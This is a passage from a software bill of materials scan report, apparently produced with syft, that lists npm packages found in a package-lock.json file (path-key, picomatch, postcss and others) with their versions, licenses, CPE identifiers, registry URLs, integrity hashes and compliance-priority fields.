source: syft-generated
- cpe: cpe:2.3:a:path:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/path-expression-matcher@1.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz
integrity: sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ffd71e909718c27d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: path-key 3.1.1'
title: path-key 3.1.1
description: 'Package discovered: path-key 3.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f9cf628256388076
name: path-key
version: 3.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:path-key:path-key:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-key:path_key:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_key:path-key:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_key:path_key:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path-key:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path_key:3.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/path-key@3.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz
integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fbb7614ee3db4371
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: path-parse 1.0.7'
title: path-parse 1.0.7
description: 'Package discovered: path-parse 1.0.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9cf335be710ffc91
name: path-parse
version: 1.0.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:path-parse_project:path-parse:1.0.7:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/path-parse@1.0.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz
integrity: sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 135178fee69fc7b7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: path-scurry 1.11.1'
title: path-scurry 1.11.1
description: 'Package discovered: path-scurry 1.11.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f605927959537dfd
name: path-scurry
version: 1.11.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BlueOak-1.0.0
spdxExpression: BlueOak-1.0.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:path-scurry:path-scurry:1.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-scurry:path_scurry:1.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_scurry:path-scurry:1.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_scurry:path_scurry:1.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path-scurry:1.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path_scurry:1.11.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/path-scurry@1.11.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz
integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==
dependencies:
lru-cache: ^10.2.0
minipass: ^5.0.0 || ^6.0.2 || ^7.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ad5632f7c396e60c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: path-to-regexp 0.1.13'
title: path-to-regexp 0.1.13
description: 'Package discovered: path-to-regexp 0.1.13'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e6c60d0f52ae43b7
name: path-to-regexp
version: 0.1.13
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:path-to-regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-to-regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_to_regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_to_regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-to:path-to-regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-to:path_to_regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_to:path-to-regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_to:path_to_regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path-to-regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path_to_regexp:0.1.13:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/path-to-regexp@0.1.13
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.13.tgz
integrity: sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c2433fd071fcfad6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: peberminta 0.9.0'
title: peberminta 0.9.0
description: 'Package discovered: peberminta 0.9.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f3acb6a3529e1191
name: peberminta
version: 0.9.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:peberminta:peberminta:0.9.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/peberminta@0.9.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz
integrity: sha512-XIxfHpEuSJbITd1H3EeQwpcZbTLHc+VVr8ANI9t5sit565tsI4/xK3KWTUFE2e6QiangUkh3B0jihzmGnNrRsQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bd0577c6ddbc7f17
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: picocolors 1.1.1'
title: picocolors 1.1.1
description: 'Package discovered: picocolors 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9b208867cdc8b323
name: picocolors
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:picocolors:picocolors:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/picocolors@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz
integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2e6faecb84cf8a8b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: picomatch 2.3.2'
title: picomatch 2.3.2
description: 'Package discovered: picomatch 2.3.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0c0ba7fcf7a893f6
name: picomatch
version: 2.3.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jonschlinkert:picomatch:2.3.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/picomatch@2.3.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz
integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 44e51885407159f3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: picomatch 4.0.4'
title: picomatch 4.0.4
description: 'Package discovered: picomatch 4.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 09943c54769c1f79
name: picomatch
version: 4.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:jonschlinkert:picomatch:4.0.4:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/picomatch@4.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz
integrity: sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b7793733f0a92625
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: pify 2.3.0'
title: pify 2.3.0
description: 'Package discovered: pify 2.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 93c54feee38dbf96
name: pify
version: 2.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:pify:pify:2.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/pify@2.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/pify/-/pify-2.3.0.tgz
integrity: sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0b578240afa70fcd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: pirates 4.0.7'
title: pirates 4.0.7
description: 'Package discovered: pirates 4.0.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 47481e92080dd044
name: pirates
version: 4.0.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:pirates:pirates:4.0.7:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/pirates@4.0.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/pirates/-/pirates-4.0.7.tgz
integrity: sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 72750f8253cdf631
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: png-js 2.0.0'
title: png-js 2.0.0
description: 'Package discovered: png-js 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7a0a81fa01919ffb
name: png-js
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses: []
language: javascript
cpes:
- cpe: cpe:2.3:a:png-js:png-js:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:png-js:png_js:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:png_js:png-js:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:png_js:png_js:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:png:png-js:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:png:png_js:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/png-js@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz
integrity: sha512-GdzJuUMc6ZSpxFJWVxtOH1bzYHym+TOnveqUjb+VJIbZWbZzyiRGFiKhbiielfpYbgMlhHVhsJ0FTazfuRFkMA==
dependencies:
fflate: ^0.8.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 017b0d73e37dad2f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: pngjs 5.0.0'
title: pngjs 5.0.0
description: 'Package discovered: pngjs 5.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 33a77729322028df
name: pngjs
version: 5.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:pngjs:pngjs:5.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/pngjs@5.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz
integrity: sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6c2c21065eca2894
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss 8.4.31'
title: postcss 8.4.31
description: 'Package discovered: postcss 8.4.31'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a519bffcd9b56c6d
name: postcss
version: 8.4.31
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss:postcss:8.4.31:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/postcss@8.4.31
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz
integrity: sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==
dependencies:
nanoid: ^3.3.6
picocolors: ^1.0.0
source-map-js: ^1.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 87700f6dfcbe47e2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss 8.5.12'
title: postcss 8.5.12
description: 'Package discovered: postcss 8.5.12'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 588683a1923c27d7
name: postcss
version: 8.5.12
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss:postcss:8.5.12:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/postcss@8.5.12
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss/-/postcss-8.5.12.tgz
integrity: sha512-W62t/Se6rA0Az3DfCL0AqJwXuKwBeYg6nOaIgzP+xZ7N5BFCI7DYi1qs6ygUYT6rvfi6t9k65UMLJC+PHZpDAA==
dependencies:
nanoid: ^3.3.11
picocolors: ^1.1.1
source-map-js: ^1.2.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f6953879c586ae44
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss-import 15.1.0'
title: postcss-import 15.1.0
description: 'Package discovered: postcss-import 15.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9f2c64d652651310
name: postcss-import
version: 15.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss-import:postcss-import:15.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-import:postcss_import:15.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_import:postcss-import:15.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_import:postcss_import:15.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss-import:15.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss_import:15.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/postcss-import@15.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz
integrity: sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==
dependencies:
postcss-value-parser: ^4.0.0
read-cache: ^1.0.0
resolve: ^1.1.7
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 49a05cdffa8a7ef9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss-js 4.1.0'
title: postcss-js 4.1.0
description: 'Package discovered: postcss-js 4.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9feba814d6f9cb30
name: postcss-js
version: 4.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss-js:postcss-js:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-js:postcss_js:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_js:postcss-js:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_js:postcss_js:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss-js:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss_js:4.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/postcss-js@4.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss-js/-/postcss-js-4.1.0.tgz
integrity: sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw==
dependencies:
camelcase-css: ^2.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 92ac10dec31ee632
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss-load-config 6.0.1'
title: postcss-load-config 6.0.1
description: 'Package discovered: postcss-load-config 6.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 07fb83a013bf4ef4
name: postcss-load-config
version: 6.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss-load-config:postcss-load-config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
